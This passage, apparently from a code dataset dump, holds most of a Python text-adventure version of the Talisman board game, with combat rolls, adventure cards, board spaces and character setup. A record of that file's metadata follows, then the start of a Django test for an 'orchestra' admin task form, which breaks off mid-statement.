Battles\ndef battle(name,strength):\n    charattack = roll() + chardict["strength"]\n    print(f"Your attack score is {charattack}.")\n    enemyattack = roll() + strength\n    print(f"The {name}'s attack score is {enemyattack}.")\n    while chardict["fate"] > 0:\n        reroll = input("Would you like to reroll for 1 fate(Y/N)? ")\n        if reroll=="Y":\n            charattack = roll() + chardict["strength"]\n            print(f"Your attack score is {charattack}.")\n            losefate()\n            break\n        elif reroll=="N": break\n        else: print(error)\n    if charattack > enemyattack:\n        print(f"You have killed the {name}.")\n        return 1\n    elif charattack < enemyattack:\n        print(f"You have been defeated by the {name}.")\n        wound()\n        return -1\n    else:\n        print(f"You have reached a stand-off with the {name}.")\n        return 0\n# Psychic Combat\ndef psychic(name,craft):\n    charattack = roll() + chardict["craft"]\n    print(f"Your attack score is {charattack}.")\n    enemyattack = roll() + craft\n    print(f"The {name}'s attack score is {enemyattack}.")\n    while chardict["fate"] > 0:\n        reroll = input("Would you like to reroll for 1 fate(Y/N)? ")\n        if reroll=="Y":\n            charattack = roll() + chardict["craft"]\n            print(f"Your attack score is {charattack}.")\n            losefate()\n            break\n        elif reroll=="N": break\n        else: print(error)\n    if charattack > enemyattack:\n        print(f"You have killed the {name}.")\n        return 1\n    elif charattack < enemyattack:\n        print(f"You have been defeated by the {name}.")\n        wound()\n        return -1\n    else:\n        print(f"You have reached a stand-off with the {name}.")\n        return 0\n#endregion\n\n# Adventures\ndef adventure(card = None, prior = False):\n    if card == None:\n        card = r.choice(adventures)\n\n    if card=="Wild Boar":\n        print("There is a Wild Boar roaming this area.")\n        result = battle("Wild Boar",1)\n    elif card=="Wolf":\n        print("A vicious Wolf now dwells in this area.")\n        result = battle("Wolf",2)\n    elif card=="Ape":\n        print("A savage Ape is terrorising this area.")\n        result = battle("Ape",3)\n    elif card=="Bear":\n        print("A ferocious Bear is running amok in this area.")\n        result = battle("Bear",3)\n    elif card=="Lion":\n        print("A Lion is preying on everything in this area.")\n        result = battle("Lion",3)\n    elif card=="Serpent":\n        print("A Serpent has made its home in this area.")\n        result = battle("Serpent",4)\n    elif card=="Dragon":\n        print("A fearsome Dragon is terrorising this area.")\n        result = battle("Dragon",7)\n    elif card=="Goblin":\n        print("A Goblin is laying waste to this area.")\n        result = battle("Goblin",2)\n    elif card=="Hobgoblin":\n        print("A brutal Hobgoblin is stalking this area.")\n        result = battle("Hobgoblin",3)\n    elif card=="Bandit":\n        print("A Bandit is marauding in this area. He will not attack if you pay 1 gold. He will remain here until he is killed.")\n        paid = False\n        if chardict["gold"] > 0:\n            while True:\n                payment = input("Do you wish to pay the bandit off(Y/N)? ")\n                if payment=="Y":\n                    poor(1)\n                    print("You have paid the bandit off.")\n                    paid = True\n                    break\n                elif payment=="N":\n                    break\n                else:\n                    print(error)\n        if paid:\n            # Paid off: no battle this visit, but the Bandit stays on this space.\n            result = 0\n        else:\n            result = battle("Bandit",4)\n    elif card=="Ogre":\n        print("An Ogre has decided this area is easy pickings.")\n        result = battle("Ogre",5)\n    elif card=="Giant":\n        print("An immense Giant has set up residence in this area.")\n        result = battle("Giant",6)\n    elif card=="Lemure":\n        print("This lowly creature from the Underworld pounces at you from the shadows.")\n        result = psychic("Lemure",1)\n    elif card=="Shadow":\n        print("A Shadow is lurking in the dark corners of this area.")\n        result = psychic("Shadow",2)\n    elif card=="Spectre":\n        print("A Spectre has appeared in this area.")\n        result = psychic("Spectre",3)\n    elif card=="Ghost":\n        if "Ghost" in spacedict[chardict["space"]]:\n            print("A Ghost haunts this area.")\n            result = psychic("Ghost",4)\n        else:\n            # "Castle" is omitted from the choices: it is not an Outer Region\n            # space, so spacedict has no entry for it yet.\n            place = r.choice(("City","Village","Graveyard","Chapel"))\n            print(f"A Ghost materialises in the {place}. 
It now haunts this area and will remain until it is killed.")\n            spacedict[place].append("Ghost")\n            result = 1\n    elif card=="Wraith":\n        print("A Wraith is wreaking havoc in this area.")\n        result = psychic("Wraith",5)\n    elif card=="Demon":\n        print("A Demon has appeared from the underworld to cause chaos in this area.")\n        result = psychic("Demon",10)\n    elif card=="Angel":\n        print("An Angel has arrived.")\n        if chardict["align"]=="Good":\n            print("Gain 1 Life.")\n            chardict["life"]+=1\n        elif chardict["align"]=="Evil":\n            print("Lose 1 Life.")\n            wound()\n        else:\n            print("Nothing happens.")\n        result = 1\n    elif card=="Blizzard":\n        print("Winter has come with a vengeance and a Blizzard envelops the land. For two rounds, all characters, no matter what Region they are in, may only move one space per turn. The Blizzard then abates to the discard pile. "+implem)\n        result = 1\n    elif card=="Book of Spells":\n        print("You have found the fabled Book of Spells. You gain your full complement of Spells, according to your current Craft. "+implem)\n        result = 1\n    elif card=="Devil":\n        print("You are visited by a Devil.")\n        if chardict["align"]=="Good":\n            print("Lose 1 Life.")\n            wound()\n        elif chardict["align"]=="Evil":\n            print("Gain 1 Life.")\n            chardict["life"]+=1\n        else:\n            print("Nothing happens.")\n        result = 1\n    elif card=="Evil Darkness":\n        print("An Evil Darkness from the nether worlds sweeps the land. All characters except those of evil alignment must miss one turn. "+implem)\n        result = 1\n    elif card=="Imp":\n        place = r.choice(("Crags","Forest","Tavern","Ruins")) # Add Hidden Valley and Cursed Glade\n        print(f"You meet a mischievous Imp. He teleports you to the {place}.")\n        chardict["space"] = place\n        result = 1\n    elif card=="Magical Vortex":\n        print("A Magical Vortex absorbs all Spells from every character. "+implem)\n        result = 1\n    elif card=="Market Day":\n        print("It's Market Day across the land. You may buy: a Sword (1G), a Helmet (1G), a Mule (2G), a Shield (2G), a Water Bottle (1G), or a Raft (3G). "+implem)\n        result = 1\n    elif card=="Mephistopheles":\n        print("You encounter Mephistopheles on a mission to this land.")\n        if chardict["align"]=="Evil":\n            print("Gain 1 Craft.")\n            chardict["craft"]+=1\n        else:\n            print("You become Evil.")\n            realign("Evil")\n        result = 1\n    elif card=="Pestilence":\n        print("Pestilence has befouled this Region.")\n        wound()\n        result = 1\n    elif card=="Raiders":\n        print("A band of Raiders attacks you and steals all your gold. They immediately stash the gold at the Oasis and retreat to their hide-out. Note: The Oasis has not yet been implemented.") # Add gold to Oasis\n        chardict["gold"] = 0\n        result = 1\n    elif card=="Siren":\n        print("A Siren's song can be heard throughout the Region. "+implem) # All characters in Region miss 1 Turn\n        result = 1\n    elif card=="Storm":\n        print("A Storm sweeps through this Region. "+implem) # All the characters in this Region must miss 1 turn.\n        result = 1\n    elif card=="Enchanter":\n        print("An Enchanter seeks an able adventurer.")\n        if chardict["craft"] < 4:\n            print("You do not have enough Craft.")\n            # The Enchanter stays on this space until an able adventurer arrives.\n            result = 0\n        else:\n            while True:\n                enchant=input("Choose one: Gain 1 Spell (S), Gain 1 gold (G), Gain 1 Strength (S2), Gain 1 Craft (C), Gain 1 Life (L), Gain 1 Fate (F), or teleport to any space in this region (T). ")\n                if enchant=="S":\n                    print(implem)\n                    break\n                if enchant=="G":\n                    print("Gain 1 gold.")\n                    chardict["gold"]+=1\n                    break\n                if enchant=="S2":\n                    print("Gain 1 Strength.")\n                    chardict["strength"]+=1\n                    break\n                if enchant=="C":\n                    print("Gain 1 Craft.")\n                    chardict["craft"]+=1\n                    break\n                if enchant=="L":\n                    print("Gain 1 Life.")\n                    chardict["life"]+=1\n                    break\n                if enchant=="F":\n                    print("Gain 1 fate.")\n                    chardict["fate"]+=1\n                    break\n                if enchant=="T":\n                    # Pair each space name with its menu number so the prompt reads\n                    # "Tavern (1)"; input() returns a string, so compare as strings.\n                    options = [x for i, s in enumerate(outer,1) for x in (s, i)]\n                    while True:\n                        place = input("Would you like to move to the: {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), or {} ({})? ".format(*options))\n                        if place in [str(n) for n in range(1,25)]:\n                            chardict["space"] = outer[int(place)-1]\n                            break\n                        else: print(error)\n                    break\n                else:\n                    print(error)\n            result = 1\n    elif card=="Fairy":\n        print("A Fairy seeks a champion.")\n        if chardict["align"] != "Good":\n            print("You are not Good enough.")\n        else:\n            while True:\n                enchant=input("Choose one: Gain 1 Spell (S), Gain 1 gold (G), Gain 1 Strength (S2), Gain 1 Craft (C), Gain 1 Life (L), Gain 1 Fate (F), or teleport to any space in this region (T). ")\n                if enchant=="S":\n                    print(implem)\n                    break\n                if enchant=="G":\n                    print("Gain 1 gold.")\n                    chardict["gold"]+=1\n                    break\n                if enchant=="S2":\n                    print("Gain 1 Strength.")\n                    chardict["strength"]+=1\n                    break\n                if enchant=="C":\n                    print("Gain 1 Craft.")\n                    chardict["craft"]+=1\n                    break\n                if enchant=="L":\n                    print("Gain 1 Life.")\n                    chardict["life"]+=1\n                    break\n                if enchant=="F":\n                    print("Gain 1 fate.")\n                    chardict["fate"]+=1\n                    break\n                if enchant=="T":\n                    options = [x for i, s in enumerate(outer,1) for x in (s, i)]\n                    while True:\n                        place = input("Would you like to move to the: {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), or {} ({})? ".format(*options))\n                        if place in [str(n) for n in range(1,25)]:\n                            chardict["space"] = outer[int(place)-1]\n                            break\n                        else: print(error)\n                    break\n                else:\n                    print(error)\n        result = 1\n    elif card=="Healer":\n        print("A Healer has made his home here for the rest of the game. He will heal up to 2 lives per visit for any character landing here.")\n        heal(2)\n        result = 0\n    elif card=="Hermit":\n        place = r.choice(("Crags","Forest")) # Add Crypt, Plain of Peril, Cursed Glade, Oasis\n        print(f"The Hermit moves to the {place}. He will give the first person to visit him there a Talisman. "+implem) # Implement\n        result = 1\n    elif card=="Mage":\n        print("A kindly Mage has made his home here for the rest of the game. He will give one Spell per visit to each Good character landing here. "+implem)\n        result = 0 # the Mage remains on this space\n    elif card=="Phantom":\n        print("A Phantom will haunt this space until it has granted the first evil character to visit it one of the following wishes.")\n        if chardict["align"] != "Evil":\n            print("You are not Evil enough.")\n            # No wish granted yet, so the Phantom keeps haunting this space.\n            result = 0\n        else:\n            while True:\n                enchant=input("Choose one: Gain 1 Spell (S), Gain 1 gold (G), Gain 1 Strength (S2), Gain 1 Craft (C), Gain 1 Life (L), Gain 1 Fate (F), or teleport to any space in this region (T). ")\n                if enchant=="S":\n                    print(implem)\n                    break\n                if enchant=="G":\n                    print("Gain 1 gold.")\n                    chardict["gold"]+=1\n                    break\n                if enchant=="S2":\n                    print("Gain 1 Strength.")\n                    chardict["strength"]+=1\n                    break\n                if enchant=="C":\n                    print("Gain 1 Craft.")\n                    chardict["craft"]+=1\n                    break\n                if enchant=="L":\n                    print("Gain 1 Life.")\n                    chardict["life"]+=1\n                    break\n                if enchant=="F":\n                    print("Gain 1 fate.")\n                    chardict["fate"]+=1\n                    break\n                if enchant=="T":\n                    options = [x for i, s in enumerate(outer,1) for x in (s, i)]\n                    while True:\n                        place = input("Would you like to move to the: {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), {} ({}), or {} ({})? ".format(*options))\n                        if place in [str(n) for n in range(1,25)]:\n                            chardict["space"] = outer[int(place)-1]\n                            break\n                        else: print(error)\n                    break\n                else:\n                    print(error)\n            result = 1\n    elif card=="Sorcerer":\n        print("A Sorcerer has set up shop here and will remain for the rest of the game. He sells Spells at the price of 1 gold per Spell. You may buy one Spell per visit. "+implem)\n        result = 0 # the Sorcerer remains on this space\n    elif card=="Witch":\n        print("A Witch lurks in this space for the rest of the game.")\n        witch = roll()\n        if witch==1:\n            print("Become a Toad for 3 turns. "+implem)\n        elif witch==2:\n            print("Lose 1 Life.")\n            wound()\n        elif witch==3:\n            print("Gain 1 Strength.")\n            chardict["strength"]+=1\n        elif witch==4:\n            print("Gain 1 Craft.")\n            chardict["craft"]+=1\n        elif witch==5:\n            print("Gain 1 Spell. "+implem)\n        elif witch==6:\n            print("Replenish all fate.")\n            replenish()\n        result = 0\n    elif card=="Cave":\n        print("This Cave will remain here. See what you discover: ")\n        cavevent = roll()\n        if cavevent==1:\n            print("You encounter a Dragon.")\n            battle("Dragon",7)\n        elif cavevent==2:\n            print("You encounter a Goblin.")\n            battle("Goblin",2)\n        elif cavevent==3:\n            print("You are lost. "+implem)\n        elif cavevent==4 or cavevent == 5:\n            print("Gain 2 gold.")\n            chardict["gold"]+=2\n        elif cavevent==6:\n            print("Gain 3 gold.")\n            chardict["gold"]+=3\n        result = 0\n    elif card=="Fountain of Wisdom":\n        # The drinks-remaining counter must persist between visits, so it is\n        # kept in a module-level variable.\n        global fountain\n        if prior == False:\n            fountain = 4\n            print("The Fountain of Wisdom is revealed. You may drink from the Fountain once per visit and gain 1 Craft. Once 4 Craft is taken, the Fountain shall vanish.")\n            chardict["craft"]+=1\n            fountain-=1\n            result = 0\n        else:\n            print("You drink from the Fountain of Wisdom and gain 1 Craft.")\n            chardict["craft"]+=1\n            fountain-=1\n            if fountain > 0:\n                print(f"There are {fountain} drinks remaining.")\n                result = 0\n            else:\n                print("The Fountain of Wisdom disappears.")\n                result = 1\n\n    else:\n        print(f"You encounter a {card}. "+implem)\n        result = 1\n    \n    if result <= 0 and prior == False:\n        spacedict[chardict["space"]].append(card)\n    elif result == 1 and prior == True:\n        spacedict[chardict["space"]].remove(card)\n    \n    if result <= 0 and card in enemies:\n        return 0\n    else:\n        return 1\n\n# Encounters\ndef encounter():\n    # Re-encounter any cards already on this space. Iterate over a copy, since\n    # killed Enemies are removed from the space's list as we go.\n    cards_here = list(spacedict[chardict["space"]])\n    count = len(cards_here)\n    for card in cards_here:\n        outcome = adventure(card,prior=True)\n        if outcome == 0: return\n    # Adventure Spaces\n    if any(x in chardict["space"] for x in ["Fields","Plains","Woods","Hills","Sentinel"]):\n        if count == 0:\n            outcome = adventure() # Draw an Adventure card\n            if outcome == 0: return\n    elif chardict["space"] == "Ruins":\n        for i in range(2-count):\n            adventure()\n    elif chardict["space"]=="Forest":\n        forevent=roll()\n        if forevent==1:\n            print("You are attacked by a brigand.")\n            result = battle("Brigand",4)\n            if result <= 0: return\n        elif forevent<4:\n            print("You are lost. "+implem) # Miss a Turn\n        elif forevent<6:\n            print("You are safe.")\n        elif forevent==6:\n            print("A Ranger guides you out. You gain 1 Craft.")\n            chardict["craft"]+=1\n    elif chardict["space"]=="Crags":\n        cragevent=roll()\n        if cragevent==1:\n            print("You are attacked by a spirit.")\n            result = psychic("Spirit",4)\n            if result <= 0: return\n        elif cragevent<4:\n            print("You are lost. "+implem) # Miss a Turn\n        elif cragevent<6:\n            print("You are safe.")\n        elif cragevent==6:\n            print("A Barbarian guides you out. Gain 1 Strength.")\n            chardict["strength"]+=1\n    elif chardict["space"]=="Graveyard":\n        if chardict["align"]=="Good":\n            print("You lose 1 Life.")\n            wound()\n        elif chardict["align"]=="Neutral":\n            print("No effect.")\n        elif chardict["align"]=="Evil":\n            gravevent=roll()\n            if gravevent==1:\n                print("Miss 1 turn. "+implem)\n            elif gravevent<5:\n                print("Heal 1 Life.")\n                heal(1)\n            elif gravevent>=5:\n                print("Gain 1 spell. "+implem)\n    elif chardict["space"]=="Tavern":\n        tavevent=roll()\n        if tavevent==1:\n            print("You get blind drunk and collapse in a corner. "+implem) # Miss a Turn\n        if tavevent==2:\n            print("You get tipsy and get in a fight with a farmer.")\n            result = battle("Farmer",3)\n            if result <= 0: return\n        if tavevent==3:\n            print("You gamble and lose 1 Gold Coin.")\n            poor(1)\n        if tavevent==4:\n            print("You gamble and win 1 Gold Coin.")\n            chardict["gold"]+=1\n        if tavevent==5:\n            print("A wizard offers to Teleport you to an Outer Region space of your choice as your next Move. "+implem)\n        if tavevent==6:\n            print("A boatman offers to ferry you to the Temple as your next Move. "+implem)\n    elif chardict["space"]=="Village":\n        while True:\n            vill=input("You may visit the Healer(H), the Blacksmith(B), or the Mystic(M): ")\n            if vill=="H":\n                print("The Healer will restore Lives at the cost of 1 Gold Coin each, up to your starting quota.")\n                if chardict["life"]==chardict["maxl"]:\n                    print("However, you are already at full health.")\n                    break\n                else:\n                    while True:\n                        med=input("How many Gold Coins would you like to pay? ")\n                        if med in ["0","1","2","3","4","5"]:\n                            med=int(med)\n                            if med > (chardict["maxl"]-chardict["life"]):\n                                print("That's too much gold, you don't need to heal that much.")\n                                continue\n                            else:\n                                poor(med)\n                                heal(med)\n                                break\n                        else:\n                            print(error)\n                    break\n            elif vill=="B":\n                print("The Blacksmith sells the following Objects at the following prices (if available): Helmet at 2G (H), Sword at 2G (S), Axe at 2G (A), Shield at 3G (S2), Armour at 4G (A2) "+implem)\n                break\n            elif vill=="M":\n                mystevent=roll()\n                if mystevent<4:\n                    print("You are ignored.")\n                elif mystevent==4:\n                    print("You become Good.")\n                    realign("Good")\n                elif mystevent==5:\n                    print("Gain 1 Craft.")\n                    chardict["craft"]+=1\n                elif mystevent==6:\n                    print("Gain 1 Spell. "+implem)\n                break\n            else:\n                print(error)\n    elif chardict["space"]=="Chapel":\n        if chardict["align"]=="Evil":\n            print("You lose one life.")\n            wound()\n        elif chardict["align"]=="Neutral":\n            print("You may be Healed back up to your starting quota at the cost of 1 Gold Coin per Life. ")\n            if chardict["life"]==chardict["maxl"]:\n                print("However, you are already at full health.")\n            else:\n                while True:\n                    med=input("How many Gold Coins would you like to pay? ")\n                    if med in ["0","1","2","3","4","5"]:\n                        med=int(med)\n                        if med > (chardict["maxl"]-chardict["life"]):\n                            print("That's too much gold, you don't need to heal that much.")\n                            continue\n                        else:\n                            poor(med)\n                            heal(med)\n                            break\n                    else:\n                        print(error)\n        elif chardict["align"]=="Good":\n            chapevent=roll()\n            if chapevent<5:\n                print("You are ignored.")\n            elif chapevent==5:\n                print("Gain 1 Life.")\n                chardict["life"]+=1\n            elif chapevent==6:\n                print("Gain 1 Spell. "+implem)\n    elif chardict["space"]=="City":\n        while True:\n            cit=input("You may visit the Enchantress(E), the Doctor(D), or the Alchemist(A): ")\n            if cit=="A":\n                print("He will turn any of your Objects into Gold Coin. Give him your Objects and get 1 Gold Coin for each. "+implem)\n                break\n            elif cit=="D":\n                print("He will Heal up to 2 Lives at the cost of 1 Gold Coin each.")\n                if chardict["life"]==chardict["maxl"]:\n                    print("However, you are already at full health.")\n                    break\n                else:\n                    while True:\n                        med=input("How many Gold Coins would you like to pay? (0, 1, or 2) ")\n                        if med in ["0","1","2"]:\n                            med=int(med)\n                            if med > (chardict["maxl"]-chardict["life"]):\n                                print("That's too much gold, you don't need to heal that much.")\n                                continue\n                            else:\n                                poor(med)\n                                heal(med)\n                                break\n                        else:\n                            print(error)\n                    break\n            elif cit=="E":\n                enchevent=roll()\n                if enchevent==1:\n                    print("You are turned into a Toad for 3 turns. "+implem)\n                elif enchevent==2:\n                    print("Lose 1 Strength.")\n                    weak()\n                elif enchevent==3:\n                    print("Lose 1 Craft.")\n                    dumb()\n                elif enchevent==4:\n                    print("Gain 1 Craft.")\n                    chardict["craft"]+=1\n                elif enchevent==5:\n                    print("Gain 1 Strength.")\n                    chardict["strength"]+=1\n                elif enchevent==6:\n                    print("Gain 1 Spell. "+implem)\n                break\n            else:\n                print(error)\n    \n    else:\n        print(implem)\n\n# region: Game\n# Introduction\nprint("Welcome to a Python implementation of Talisman (Revised 4th Edition). In this simplified version (v0.2), there is no winning objective. To play the game, type a letter to signal your decision when given a prompt.")\n# Acknowledgement\nwhile True:\n    ack=input("Type Yes(Y) to acknowledge: ")\n    if ack == "Y":\n        print("\nGreat! 
Then let us begin.\")\n break\n else:\n print(error)\n# Character Setup\nprint(\"Now you need to choose which character you will enter the land of Talisman as.\")\nwhile True:\n char=input(\"Will you be the Assassin(A), the Druid(D), the Dwarf(D2), the Elf(E), the Ghoul(G), the Minstrel(M), the Monk(M2), the Priest(P), the Prophetess(P2), the Sorceress(S), the Thief(T), the Troll(T2), the Warrior(W), or the Wizard(W2)? \")\n if char in [\"A\",\"D\",\"D2\",\"E\",\"G\",\"M\",\"M2\",\"P\",\"P2\",\"S\",\"T\",\"T2\",\"W\",\"W2\"]:\n chardict=emptydict.copy()\n if char == \"A\":\n chardict.update({\"name\":\"Assassin\",\"start\":\"City\",\"align\":\"Evil\",\"strength\":3,\"craft\":3,\"life\":4,\"fate\":3})\n chardict[\"addinfo\"]=\"You may assassinate when you attack a character or creature. You cannot assassinate when you are attacked by another character. When you assassinate, battle takes place as normal except that your victim may not roll a die to add to his Strength. If you win, you must force the loser to lose 1 life; you cannot take an Object or gold instead. You may not assassinate while at the Crown of Command.\"\n elif char==\"D\":\n chardict.update({\"name\":\"Druid\",\"start\":\"Forest\",\"align\":\"Neutral\",\"strength\":2,\"craft\":4,\"life\":4,\"fate\":4})\n chardict[\"addinfo\"]=\"You begin the game with one Spell. You may change your alignment at will. At any given time though, you can only be of one alignment. For example, if you are carrying the Runesword and you wish to pray at the Chapel, you must ditch the Runesword. Whenever you land on the Woods, you may gain your full complement of Spells, according to your current Craft.\"\n elif char == \"D2\":\n chardict.update({\"name\":\"Dwarf\",\"start\":\"Crags\",\"align\":\"Neutral\",\"strength\":3,\"craft\":3,\"life\":5,\"fate\":5})\n chardict[\"addinfo\"]=\"You need not roll the die in the Crags or the Chasm unless you wish to. If you choose to roll, you must accept the result. You may evade creatures and characters in the Hills. After rolling the die in the Cave, you may add 1 to the score. You need only roll 1 die if you attempt to open the Portal of Power by Craft. You need only roll 2 dice in the Mines. You are unaffected by the Maze.\"\n elif char == \"E\":\n chardict.update({\"name\":\"Elf\",\"start\":\"Forest\",\"align\":\"Good\",\"strength\":3,\"craft\":4,\"life\":4,\"fate\":3})\n chardict[\"addinfo\"]=\"You need not roll the die in the Forest unless you wish to. If you choose to roll, you must accept the result. You may evade creatures and characters in the Woods. If you are on the Woods, instead of rolling the die for your move, you may move to any other Woods in the same Region.\"\n elif char == \"G\":\n chardict.update({\"name\":\"Ghoul\",\"start\":\"Graveyard\",\"align\":\"Evil\",\"strength\":2,\"craft\":4,\"life\":4,\"fate\":4})\n chardict[\"addinfo\"]=\"When you attack another character, you may choose to make the attack psychic combat. You may not do this when you are attacked by another character. Whenever you defeat a character in psychic combat, if you choose to take one of his lives, add it to your own. When you kill an Enemy in battle, you may raise it from the dead and keep it as a Follower instead of a trophy. You may have one of your raised Followers add its Strength to yours for one battle, after which it disintegrates to the discard pile. 
You may only use one raised Follower per battle.\"\n elif char == \"M\":\n chardict.update({\"name\":\"Minstrel\",\"start\":\"Tavern\",\"align\":\"Good\",\"strength\":2,\"craft\":4,\"life\":4,\"fate\":5})\n chardict[\"addinfo\"]=\"Animals and Dragons will not attack you, although you may choose to attack them. If you do not attack an Animal, you may attempt to charm it. To do so, roll 1 die: if you roll higher than the Animal's Strength, it joins you as a Follower and adds its Strength to yours in battle. You may only use one charmed Animal per battle. You may take the Maiden and Princess from a character you land on.\"\n elif char == \"M2\":\n chardict.update({\"name\":\"Monk\",\"start\":\"Village\",\"align\":\"Good\",\"strength\":2,\"craft\":3,\"life\":4,\"fate\":5})\n chardict[\"addinfo\"]=\"Your inner belief allows you to add your Craft value to your Strength during battle. After rolling the die when praying, you may add 1 to the score. You may not use any Weapon or Armour during battle.\"\n elif char == \"P\":\n chardict.update({\"name\":\"Priest\",\"start\":\"Chapel\",\"align\":\"Good\",\"strength\":2,\"craft\":4,\"life\":4,\"fate\":5})\n chardict[\"addinfo\"]=\"You begin the game with one Spell. After rolling the die when praying, you may add 1 to the score. You may choose to automatically destroy any Spirits without resorting to psychic combat. When you destroy a Spirit in this manner, you may not keep the Enemy as a trophy but you may gain one Spell. You may not use any Weapon during battle.\"\n elif char == \"P2\":\n chardict.update({\"name\":\"Prophetess\",\"start\":\"Chapel\",\"align\":\"Good\",\"strength\":2,\"craft\":4,\"life\":4,\"fate\":2})\n chardict[\"addinfo\"]=\"You begin the game with one Spell. During the game, you always have at least one Spell. (Gain a Spell each time you cast your last Spell). Whenever you have to draw Adventure Cards, you may discard one card of your choice that you do not wish to encounter and draw one more card to replace it, which you must encounter. At any time during the game, you may look at the Spell Cards held by other characters.\"\n elif char == \"S\":\n chardict.update({\"name\":\"Sorceress\",\"start\":\"Graveyard\",\"align\":\"Evil\",\"strength\":2,\"craft\":4,\"life\":4,\"fate\":3})\n chardict[\"addinfo\"]=\"You begin the game with one Spell. When you attack another character, you may choose to make the attack psychic combat. You may not do this when you are attacked by another character. You may attempt to beguile a character that you land on, allowing you to take one gold or Object of your choice. To do so, roll one die: you must roll a 6 to beguile a good character; 5 or 6 for a neutral character; or a 4, 5, or 6 for an evil character. You may take any one Follower, except the Maiden, Unicorn, or Princess from a character that you land on.\"\n elif char == \"T\":\n chardict.update({\"name\":\"Thief\",\"start\":\"City\",\"align\":\"Neutral\",\"strength\":3,\"craft\":3,\"life\":4,\"fate\":2})\n chardict[\"addinfo\"]=\"You may take one gold or Object of your choice from a character that you land on. Whenever you visit the Market, Market Day, or Village you may take one card of your choice from the Purchase deck for free.\"\n elif char == \"T2\":\n chardict.update({\"name\":\"Troll\",\"start\":\"Crags\",\"align\":\"Neutral\",\"strength\":6,\"craft\":1,\"life\":6,\"fate\":1})\n chardict[\"addinfo\"]=\"You need not roll the die in the Crags unless you wish to. If you choose to roll, you must accept the result. 
Whenever you roll a 6 for your move, you may regenerate instead of moving. If you choose to regenerate, heal one life and your turn immediately ends.\"\n elif char == \"W\":\n chardict.update({\"name\":\"Warrior\",\"start\":\"Tavern\",\"align\":\"Neutral\",\"strength\":4,\"craft\":2,\"life\":5,\"fate\":1})\n chardict[\"addinfo\"]=\"You may roll two dice in battle and use the higher attack roll to determine your attack score. You may use two Weapons at the same time.\"\n elif char == \"W2\":\n chardict.update({\"name\":\"Wizard\",\"start\":\"Graveyard\",\"align\":\"Evil\",\"strength\":2,\"craft\":5,\"life\":4,\"fate\":3})\n chardict[\"addinfo\"]=\"You begin the game with two Spells. During the game, you always have at least one Spell. (Gain a Spell each time you cast your last Spell) When you attack another character, you may choose to make the attack psychic combat. You may not do this when you are attacked by another character.\"\n print(\"\\nGood choice! You are now the {name}. You are a {align} character who starts in the {start}. You have {strength} strength, {craft} craft, {life} life, and {fate} fate. {addinfo}\".format(**chardict))\n break\n else:\n print(error)\n# Begin Game\nwhile True:\n ready=input(\"Are you ready to proceed(Y/N)? \")\n if ready==\"Y\":\n print(\"\\nThen we are ready to begin.\")\n break\n elif ready==\"N\":\n print(\"\\nHm, I'm sorry you don't feel ready, but I'm afraid we must proceed anyways.\")\n continue\n else:\n print(error)\n# Starting Setup\nchardict[\"space\"]=chardict[\"start\"]\nchardict[\"mins\"]=chardict[\"strength\"]\nchardict[\"minc\"]=chardict[\"craft\"]\nchardict[\"maxl\"]=chardict[\"life\"]\nchardict[\"maxf\"]=chardict[\"fate\"]\nprint(\"You start at the {space}. You must now move.\".format(**chardict),end=\" \")\n\n[turn() for i in range(1000)] # Game\n\n# Conclusion\ngameover()\n#endregion\n","sub_path":"python/talisman.py","file_name":"talisman.py","file_ext":"py","file_size_in_byte":40738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"335245396","text":"from unittest.mock import patch\n\nfrom django.forms.models import model_to_dict\nfrom django.test import override_settings\nfrom django.utils import timezone\n\nfrom orchestra.admin.forms import TaskForm\nfrom orchestra.core.errors import WorkerCertificationError\nfrom orchestra.models import Task\nfrom orchestra.models import TaskAssignment\nfrom orchestra.tests.helpers import OrchestraTestCase\nfrom orchestra.tests.helpers.fixtures import setup_models\nfrom orchestra.tests.helpers.fixtures import ProjectFactory\nfrom orchestra.utils.task_lifecycle import assign_task\nfrom orchestra.utils.task_lifecycle import create_subsequent_tasks\nfrom orchestra.utils.task_lifecycle import submit_task\nfrom orchestra.utils.task_properties import assignment_history\nfrom orchestra.utils.task_properties import is_worker_assigned_to_task\n\n\nclass AdminTestCase(OrchestraTestCase):\n\n def setUp(self):\n super(AdminTestCase, self).setUp()\n setup_models(self)\n\n @override_settings(MACHINE_STEP_SCHEDULER=(\n 'orchestra.utils.machine_step_scheduler',\n 'SynchronousMachineStepScheduler'))\n def test_task_form_init(self):\n \"\"\"\n Test task form initialization for new, human and machine tasks\n \"\"\"\n # Create new task form\n # (Test form init with no task instance)\n TaskForm()\n\n project = self.projects['test_human_and_machine']\n self.assertEquals(Task.objects.filter(project=project).count(), 0)\n create_subsequent_tasks(project)\n\n # Human 
task was created but not assigned\n # (Test form init with empty assignment history)\n self.assertEquals(Task.objects.filter(project=project).count(),\n 1)\n human_task = Task.objects.filter(project=project).first()\n form = TaskForm(instance=human_task)\n self.assertEquals(form.fields['currently_assigned_to'].initial,\n None)\n\n # Human task assigned to entry_level worker\n # (Test form init with a single entry-level worker)\n human_task = assign_task(self.workers[0].id, human_task.id)\n form = TaskForm(instance=human_task)\n with patch('orchestra.utils.task_lifecycle._is_review_needed',\n return_value=True):\n human_task = submit_task(human_task.id, {},\n TaskAssignment.SnapshotType.SUBMIT,\n self.workers[0], 0)\n self.assertEquals(form.fields['currently_assigned_to'].initial,\n self.workers[0].id)\n\n # Human task under review\n # (Test form init with both an entry-level worker and reviewer)\n human_task = assign_task(self.workers[1].id, human_task.id)\n form = TaskForm(instance=human_task)\n with patch('orchestra.utils.task_lifecycle._is_review_needed',\n return_value=False):\n human_task = submit_task(human_task.id, {},\n TaskAssignment.SnapshotType.ACCEPT,\n self.workers[1], 0)\n self.assertEquals(form.fields['currently_assigned_to'].initial,\n 